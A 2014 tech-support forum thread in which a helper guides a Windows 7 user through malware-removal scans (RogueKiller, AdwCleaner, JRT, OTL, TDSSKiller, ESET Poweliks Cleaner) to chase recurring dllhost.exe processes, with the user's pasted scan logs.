[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*1*]
@="?????????????????? v1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*1*\CLSID]
@="{E23FE9C6-778E-49D4-B537-38FCDE4887D8}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*2*]
@="?????????????????? v2"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*2*\CLSID]
@="{9BE31822-FDAD-461B-AD51-BE1D1C159921}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-11-03 15:20:25
ComboFix-quarantined-files.txt 2014-11-03 20:20
.
Pre-Run: 891,830,935,552 bytes free
Post-Run: 891,910,053,888 bytes free
.
- - End Of File - - 8292DE2ED1738E0AB4908841DA4909F5
After running these tools, for now I'm not seeing any of the duplicate processes running in the task manager. I've posted the logs below.
phew!
let's run a couple scans to see if anything else is hiding.
Please download RogueKiller and save it to your desktop.
You can check here (http://support.microsoft.com/kb/827218) if you're not sure if your computer is 32-bit or 64-bit
Download RogueKiller (http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe) to your desktop.
Quit all running programs.
For Windows XP, double-click to start.
For Vista,Windows 7/8, Right-click on the program and select Run as Administrator to start and when prompted allow it to run.
Read and accept the EULA (End User Licene Agreement)
Click Scan to scan the system.
When the scan completes Close the program > Don't Fix anything!
Don't run any other options, they're not all bad!!
Post back the report which should be located on your desktop.
~~~~~~~~~~~~~~~~~~~~~
-AdwCleaner-by Xplode
Click on this link to download : ADWCleaner (http://www.bleepingcomputer.com/download/adwcleaner/)
Click on ONE of the Two Blue Download Now buttons That have a blue arrow beside them and save it to your desktop.
Do not click on any links in the top Advertisment.
http://thespykiller.co.uk/files/adwcleaner_download.png
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.
NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why (http://www.im-infected.com/hijacker/isearch-avg-comsearch-hijacker.html) and Here (http://nojesusnopeas.blogspot.com/2012/08/sorry-but-avg-secure-search-is-malware.html). You can always Reinstall (http://www.avg.com/us-en/secure-search) it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://imageshack.us/a/img841/7292/thisisujrt.gif
Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/) to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
~~~
please post
RogueKiller
C:\AdwCleaner.txt
JRT.txt
ascot1340
2014-11-04, 01:42
RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Ryan [Administrator]
Mode : Scan -- Date : 11/03/2014 18:18:39
¤¤¤ Processes : 0 ¤¤¤
¤¤¤ Registry : 21 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
¤¤¤ Tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 9426ba02345292a0bee50c7b41104940
[BSP] 3e8d433fc34d5ce61be57210180c8fe4 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 600 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1230848 | Size: 941267 MB
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 1928945664 | Size: 12000 MB
User = LL1 ... OK
User = LL2 ... OK
# AdwCleaner v3.311 - Report created 03/11/2014 at 18:22:51
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Ryan - RYAN-PC
# Running from : C:\Users\Ryan\Desktop\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
***** [ Scheduled Tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
*************************
AdwCleaner[R0].txt - [670 octets] - [03/11/2014 18:21:38]
AdwCleaner[S0].txt - [592 octets] - [03/11/2014 18:22:51]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [651 octets] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.5 (10.31.2014:1)
OS: Windows 7 Home Premium x64
Ran by Ryan on Mon 11/03/2014 at 18:27:59.66
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
~~~ Files
~~~ Folders
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 11/03/2014 at 18:29:46.58
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Are we still good?
Scans didn't show anything alarming.
ascot1340
2014-11-04, 04:38
Something's wrong with my internet browser. Some pages (like this forum) open fine, but other pages (google for example) won't open and just have a blank white page.
Seems many are having this problem.
Click on the three horizontal lines at far right end of the chrome address bar.
Got to Settings, then Advanced Settings
At the very bottom of the page, click on Reset Browser Settings.
Click back to page 11
https://productforums.google.com/forum/#!topic/chrome/FwgIERQmHxg
scroll to post from Sarah MM
ascot1340
2014-11-04, 22:36
I'm using Internet Explorer not Google Chrome, but I tried the same thing (resetting the Internet Explorer settings under the Advanced Internet Options) and it seems to have done the trick. Still no sign of the duplicate dllhost.exe *32 processes in the task manager, so hopefully they don't come back this time!
ascot1340
2014-11-04, 22:48
It's back and I just watched it happen, I was browsing the internet (reading an article about a novel) when a little black window opened for a second and then closed and then I looked in the task manager and the dllhost.exe *32 processes are back.
Don't know where this is hiding.
Download OTL (http://oldtimer.geekstogo.com/OTL.exe) to your desktop.
Double click on the icon to run it.
Make sure all other windows are closed and to let it run uninterrupted.
https://dl.dropbox.com/u/73555776/OTL_Main_Tutorial.gif
Select All Users.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
CREATERESTOREPOINT
Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
Post both logs DO NOT ATTACH THEM.
~~~~~~~~~~~~~~~~~~~~`
Download the latest version of TDSSKiller from here (http://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe) and save it to your Desktop.
Doubleclick on TDSSKiller.exe to run the application
https://dl.dropbox.com/u/73555776/tdss%20start.JPG
Then click on Change parameters.
https://dl.dropbox.com/u/73555776/tdss%20Change%20param.JPG
Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects , then click OK.
Click the Start Scan button.
If a suspicious object is detected, the default action will be Skip, click on Continue.
https://dl.dropbox.com/u/73555776/tdss%20threat.JPG
If malicious objects are found, they will show in the Scan results and offer three (3) options.
Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
Get the report by selecting Reports
https://dl.dropbox.com/u/73555776/tdss%20report.JPG
Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.
A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.
*****
Both of these logs will be long, if need be make multiple post.
Step 1
http://deeprybka.trojaner-board.de/tools/poweliks/logo.png
Please download Powelikscleaner (http://download.eset.com/special/ESETPoweliksCleaner.exe) (by ESET) and save it to your Desktop.
Double-click ESETPoweliksCleaner.exe to start the tool.
Read the terms of the End-user license agreement and click Agree if you agree to them.
The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
The tool will produce a log in the same directory the tool was run from.
Please copy and paste the log in your next reply.
http://deeprybka.trojaner-board.de/tools/poweliks/1.png
http://deeprybka.trojaner-board.de/tools/poweliks/2.png
ascot1340
2014-11-07, 00:02
The duplicate dllhost.exe *32 processes haven't returned after my last post. Should I go ahead and run the scans you suggested in your last two posts or wait to see if the problem comes back and run them while the processes are active?
Go ahead and run TDSSKiller and ESETPoweliksCleaner.exe
ascot1340
2014-11-07, 23:36
The logs exceed the 200000 character limit so I'll have to break them up and paste them in separate posts. TDSSKiller detected one threat but "Cure" wasn't an option so I selected "skip." ESETPoweliksCleaner.exe says "Threat Not Found." The duplicate processes still aren't running in the task manager, but I did have to reset my internet security settings to default levels again to be able to download the tools.
15:58:36.0103 0x4ac4 TDSS rootkit removing tool 3.0.0.41 Oct 28 2014 17:58:34
15:58:41.0594 0x4ac4 ============================================================
15:58:41.0594 0x4ac4 Current date / time: 2014/11/07 15:58:41.0594
15:58:41.0594 0x4ac4 SystemInfo:
15:58:41.0594 0x4ac4
15:58:41.0594 0x4ac4 OS Version: 6.1.7601 ServicePack: 1.0
15:58:41.0594 0x4ac4 Product type: Workstation
15:58:41.0594 0x4ac4 ComputerName: RYAN-PC
15:58:41.0594 0x4ac4 UserName: Ryan
15:58:41.0594 0x4ac4 Windows directory: C:\Windows
15:58:41.0594 0x4ac4 System windows directory: C:\Windows
15:58:41.0594 0x4ac4 Running under WOW64
15:58:41.0594 0x4ac4 Processor architecture: Intel x64
15:58:41.0594 0x4ac4 Number of processors: 8
15:58:41.0594 0x4ac4 Page size: 0x1000
15:58:41.0594 0x4ac4 Boot type: Normal boot
15:58:41.0594 0x4ac4 ============================================================
15:58:41.0735 0x4ac4 KLMD registered as C:\Windows\system32\drivers\24745424.sys
15:58:42.0343 0x4ac4 System UUID: {083DED25-CA73-B384-BB03-73A759006CA2}
15:58:43.0342 0x4ac4 Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
15:58:43.0357 0x4ac4 ============================================================
15:58:43.0357 0x4ac4 \Device\Harddisk0\DR0:
15:58:43.0373 0x4ac4 MBR partitions:
15:58:43.0373 0x4ac4 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x12C800, BlocksNum 0x72E69800
15:58:43.0373 0x4ac4 ============================================================
15:58:43.0451 0x4ac4 C: <-> \Device\Harddisk0\DR0\Partition1
15:58:43.0451 0x4ac4 ============================================================
15:58:43.0451 0x4ac4 Initialize success
15:58:43.0451 0x4ac4 ============================================================
15:59:29.0284 0x42d8 ============================================================
15:59:29.0284 0x42d8 Scan started
15:59:29.0284 0x42d8 Mode: Manual; SigCheck; TDLFS;
15:59:29.0284 0x42d8 ============================================================
15:59:29.0284 0x42d8 KSN ping started
15:59:31.0780 0x42d8 KSN ping finished: true
15:59:32.0763 0x42d8 ================ Scan system memory ========================
15:59:32.0763 0x42d8 System memory - ok
15:59:32.0763 0x42d8 ================ Scan services =============================
15:59:32.0997 0x42d8 [ FEF046400B75C4495AEC3D8A8CCE6014, 7A176DE9DD19A6F155AF0DBCD52C2AEF0F745018F4969C286DE62DA6D5C33DDA ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys
15:59:33.0043 0x42d8 1394ohci - ok
15:59:33.0090 0x42d8 [ F84676C7D6684E86D3F05B2C5E9019B1, 6F8F4ACD47521878C1877F4D1DFFC8A11AE560E6933B7C55EAC833CCFEE1BDE5 ] ACPI C:\Windows\system32\drivers\ACPI.sys
15:59:33.0106 0x42d8 ACPI - ok
15:59:33.0137 0x42d8 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys
15:59:33.0137 0x42d8 AcpiPmi - ok
15:59:33.0277 0x42d8 [ C5679E5186B2FC95BC76A8A9870D5456, 70AC61850B811A0A902532F098AE1D5DF4622455E56C78B89D4ABDBE4A061A48 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
15:59:33.0293 0x42d8 AdobeARMservice - ok
15:59:33.0402 0x42d8 [ 4ECFCAAE5CB380F58934F0DCF5F64E7F, D82B37E57D93484D7A3CB65470BCD54A578A695F0203A8DD441B1348C1EEA751 ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
15:59:33.0433 0x42d8 AdobeFlashPlayerUpdateSvc - ok
15:59:33.0496 0x42d8 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
15:59:33.0511 0x42d8 adp94xx - ok
15:59:33.0543 0x42d8 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\drivers\adpahci.sys
15:59:33.0558 0x42d8 adpahci - ok
15:59:33.0605 0x42d8 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
15:59:33.0621 0x42d8 adpu320 - ok
15:59:33.0652 0x42d8 [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
15:59:33.0683 0x42d8 AeLookupSvc - ok
15:59:33.0792 0x42d8 [ FA886682CFC5D36718D3E436AACF10B9, F80AB4F91AA6B5C7ECCB000D8E1BC2CF776DC3D69B3D9EBC2558C19035A6B3AB ] AFD C:\Windows\system32\drivers\afd.sys
15:59:33.0839 0x42d8 AFD - ok
15:59:33.0855 0x42d8 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys
15:59:33.0870 0x42d8 agp440 - ok
15:59:33.0886 0x42d8 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe
15:59:33.0901 0x42d8 ALG - ok
15:59:33.0979 0x42d8 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys
15:59:33.0995 0x42d8 aliide - ok
15:59:34.0026 0x42d8 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys
15:59:34.0042 0x42d8 amdide - ok
15:59:34.0057 0x42d8 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
15:59:34.0089 0x42d8 AmdK8 - ok
15:59:34.0120 0x42d8 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\drivers\amdppm.sys
15:59:34.0135 0x42d8 AmdPPM - ok
15:59:34.0151 0x42d8 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys
15:59:34.0167 0x42d8 amdsata - ok
15:59:34.0198 0x42d8 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\drivers\amdsbs.sys
15:59:34.0229 0x42d8 amdsbs - ok
15:59:34.0229 0x42d8 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys
15:59:34.0245 0x42d8 amdxata - ok
15:59:34.0276 0x42d8 [ E1D50C4B23B1DD2D5B97DAE215A400C9, 54D17CD3486014CDED22FAF89727A1BA709F83BFC6E0EBBDBF16840BC24D8628 ] AppID C:\Windows\system32\drivers\appid.sys
15:59:34.0307 0x42d8 AppID - ok
15:59:34.0323 0x42d8 [ EA673696AA352A0D87091C794C69C407, C04CC376B46904A6E067DC9FCDB3E1EA321A69E7DD1B4916BD48ED0D3535A655 ] AppIDSvc C:\Windows\System32\appidsvc.dll
15:59:34.0338 0x42d8 AppIDSvc - ok
15:59:34.0369 0x42d8 [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] Appinfo C:\Windows\System32\appinfo.dll
15:59:34.0385 0x42d8 Appinfo - ok
15:59:34.0463 0x42d8 [ 221564CC7BE37611FE15EACF443E1BF6, 381BDF17418C779D72332431BA174C2AD76CD9C7C1711FF5142EA9B05D5555E4 ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
15:59:34.0479 0x42d8 Apple Mobile Device - ok
15:59:34.0588 0x42d8 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\drivers\arc.sys
15:59:34.0603 0x42d8 arc - ok
15:59:34.0619 0x42d8 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\drivers\arcsas.sys
15:59:34.0635 0x42d8 arcsas - ok
15:59:34.0759 0x42d8 [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
15:59:34.0775 0x42d8 aspnet_state - ok
15:59:34.0837 0x42d8 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
15:59:34.0884 0x42d8 AsyncMac - ok
15:59:34.0931 0x42d8 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys
15:59:34.0947 0x42d8 atapi - ok
15:59:35.0040 0x42d8 [ BCC09E0B0362741D0C084828A1B950F3, 0B63874E4ED11EFC626144BEE964BBEED665466582FC5DC12333C02101EF414C ] AthBTPort C:\Windows\system32\DRIVERS\btath_flt.sys
15:59:35.0056 0x42d8 AthBTPort - ok
15:59:35.0134 0x42d8 [ 379A6AB7F2AD8FC61B1306767083D705, 7B484048EC2A66EA09D4B5B9312C517A9C3618C7A5B952E863DF31DE9EA38603 ] AtherosSvc C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
15:59:35.0149 0x42d8 AtherosSvc - detected UnsignedFile.Multi.Generic ( 1 )
15:59:37.0723 0x42d8 Detect skipped due to KSN trusted
15:59:37.0723 0x42d8 AtherosSvc - ok
15:59:37.0879 0x42d8 [ 4EF8D5C1C0A02A9D1C2C465BA730EE69, 7F95825CE146FA8C6F8E0C8689D8750664622FD38E1FBD85231C58C880474E86 ] athr C:\Windows\system32\DRIVERS\athrx.sys
15:59:37.0957 0x42d8 athr - ok
15:59:38.0020 0x42d8 [ 2C1B6A64294F2182DC4999F923873974, 6D611636D849631BB1F852DC03A98BBFEC4D797A2707CA63427E187F0725A796 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
15:59:38.0051 0x42d8 AudioEndpointBuilder - ok
15:59:38.0067 0x42d8 [ 2C1B6A64294F2182DC4999F923873974, 6D611636D849631BB1F852DC03A98BBFEC4D797A2707CA63427E187F0725A796 ] AudioSrv C:\Windows\System32\Audiosrv.dll
15:59:38.0082 0x42d8 AudioSrv - ok
15:59:38.0129 0x42d8 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll
15:59:38.0223 0x42d8 AxInstSV - ok
15:59:38.0254 0x42d8 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\drivers\bxvbda.sys
15:59:38.0285 0x42d8 b06bdrv - ok
15:59:38.0316 0x42d8 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys
15:59:38.0332 0x42d8 b57nd60a - ok
15:59:38.0410 0x42d8 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll
15:59:38.0425 0x42d8 BDESVC - ok
